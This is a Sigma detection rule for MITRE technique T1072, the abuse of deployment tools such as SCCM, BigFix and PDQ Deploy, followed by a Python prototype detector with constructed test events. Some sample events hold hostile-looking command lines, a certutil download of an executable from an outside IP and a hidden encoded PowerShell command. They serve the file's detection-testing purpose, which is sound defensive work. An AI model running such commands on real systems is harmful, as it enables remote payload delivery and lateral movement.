title: Software Deployment Tools (T1072)
id: df00tech-t1072
status: experimental
description: "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications — including Microsoft SCCM/ConfigMgr, HCL BigFix, PDQ Deploy, Symantec Altiris, Microsoft Intune, Azure Arc, AWS Systems Manager (SSM), and RAdmin — are widely deployed for enterprise endpoint management. Adversaries who compromise or abuse these platforms gain the ability to execute arbitrary commands across all enrolled systems simultaneously, often running as SYSTEM or with elevated privileges. Real-world abuse includes APT32 compromising McAfee ePO for malware distribution, Sandworm Team using RemoteExec for agentless lateral movement, Medusa Group deploying ransomware payloads via BigFix and PDQ Deploy, and Threat Group-1314 abusing Altiris for network-wide propagation."
references:
  - https://attack.mitre.org/techniques/T1072/
  - https://df00tech.com/detections/T1072
author: df00tech
date: 2026/04/13
tags:
  - attack.t1072
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Placeholder only: this selection matches every process_creation event, so at
  # level high it will fire on every process start. Replace it with the KQL/SPL
  # logic published on df00tech (or an equivalent Sigma selection) before enabling.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "SCCM/ConfigMgr routinely spawns PowerShell and cmd.exe to execute legitimate software deployment scripts, patch management, and compliance remediation — build an allowlist of authorized script names and package GUIDs from InitiatingProcessCommandLine"
  - "BigFix (HCL) and PDQ Deploy are frequently used for IT administration tasks including software installs, configuration changes, and script execution that legitimately trigger this detection during patch cycles"
  - "Intune Management Extension (IntuneManagementExtension.exe) executes PowerShell scripts deployed by administrators for device configuration, security baseline enforcement, and application installation"
  - "AWS Systems Manager Run Command legitimately executes shell commands on EC2 instances for patch management, inventory collection, and operational runbooks — tune by allowlisting known SSM document names"
  - "Automated patch management tools may use certutil or bitsadmin for downloading and verifying update packages from vendor CDNs"
  - "Monitoring and inventory agents (SCCM hardware inventory, BigFix relevance queries) run net.exe and systeminfo.exe on a schedule to collect asset data"
level: high
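The rule above ships with a placeholder selection, so here is a prototype of the logic its false-positive notes describe, run over a handful of constructed process-creation events: a deployment agent spawning a script host or a download/recon LOLBin, minus an allowlist of approved script names and package GUIDs. This is an added example for this page, not df00tech's rule or its KQL/SPL query. Every agent binary name except IntuneManagementExtension.exe (which the falsepositives name) is an assumption about common deployments; the sample events, paths and allowlist entries are constructed.

```python
"""Prototype T1072 process-creation check (added example, not the page's rule).

Agent binary names other than IntuneManagementExtension.exe are assumptions;
verify them against your own endpoints before reusing this logic.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Parent processes of enterprise deployment agents (assumed names).
DEPLOYMENT_AGENTS = {
    "ccmexec.exe",                    # SCCM/ConfigMgr client (assumption)
    "besclient.exe",                  # HCL BigFix client (assumption)
    "pdqdeployrunner-1.exe",          # PDQ Deploy runner (assumption)
    "intunemanagementextension.exe",  # Intune Management Extension (named in the rule)
    "ssm-document-worker.exe",        # AWS SSM agent worker (assumption)
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"certutil.exe", "bitsadmin.exe", "net.exe", "net1.exe", "systeminfo.exe"}

# Constructed allowlist; in production derive it from the command lines of
# known-good deployments (InitiatingProcessCommandLine in Defender data).
ALLOWED_SCRIPTS = {"patch-baseline.ps1", "hw-inventory.ps1"}
ALLOWED_PACKAGE_GUIDS = {"{7f3a9b2e-4c1d-4e8a-9b6f-2d5c8e1a0f44}"}

# powershell.exe accepts -e, -ec, -enc ... -EncodedCommand. An encoded payload
# never gets the allowlist exemption even if the command line also mentions an
# approved script name, since that name could be a decoy.
ENCODED_FLAG = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?(?!\S)", re.IGNORECASE)


@dataclass
class Event:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    event: Event
    reason: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_allowlisted(command_line: str) -> bool:
    cl = command_line.lower()
    if ENCODED_FLAG.search(cl):
        return False
    return any(s in cl for s in ALLOWED_SCRIPTS) or any(
        g.lower() in cl for g in ALLOWED_PACKAGE_GUIDS
    )


def evaluate(event: Event) -> Optional[Alert]:
    parent, child = _basename(event.parent_image), _basename(event.image)
    if parent not in DEPLOYMENT_AGENTS:
        return None
    if child in SCRIPT_HOSTS and not is_allowlisted(event.command_line):
        return Alert(event, f"{parent} spawned {child} outside the allowlist")
    if child in LOLBINS:
        return Alert(event, f"{parent} spawned LOLBin {child}")
    return None


def run(events: List[Event]) -> List[Alert]:
    return [a for a in map(evaluate, events) if a is not None]


# Constructed sample events, not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(r"C:\Program Files (x86)\Microsoft Intune Management Extension\IntuneManagementExtension.exe",
          PS, r"powershell.exe -ep Bypass -File C:\IME\Scripts\patch-baseline.ps1"),
    Event(r"C:\Windows\CCM\CcmExec.exe", PS,
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event(r"C:\Program Files (x86)\BigFix Enterprise\BES Client\BESClient.exe",
          r"C:\Windows\System32\certutil.exe",
          r"certutil.exe -urlcache -split -f http://203.0.113.5/svc.exe C:\ProgramData\svc.exe"),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    Event(r"C:\Windows\AdminArsenal\PDQDeployRunner\PDQDeployRunner-1.exe",
          r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c msiexec /i C:\Packages\{7f3a9b2e-4c1d-4e8a-9b6f-2d5c8e1a0f44}\app.msi /qn"),
    Event(r"C:\Windows\CCM\CcmExec.exe", PS,
          "powershell.exe -File patch-baseline.ps1 -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0A"),
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert.reason, "::", alert.command_line if False else alert.event.command_line)
```

Events 0, 3 and 4 stay quiet (allowlisted script, non-agent parent, allowlisted package GUID); events 1, 2 and 5 alert. The last one is the edge case worth keeping: the command line names an approved script but also carries an encoded command, so the allowlist is deliberately bypassed.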
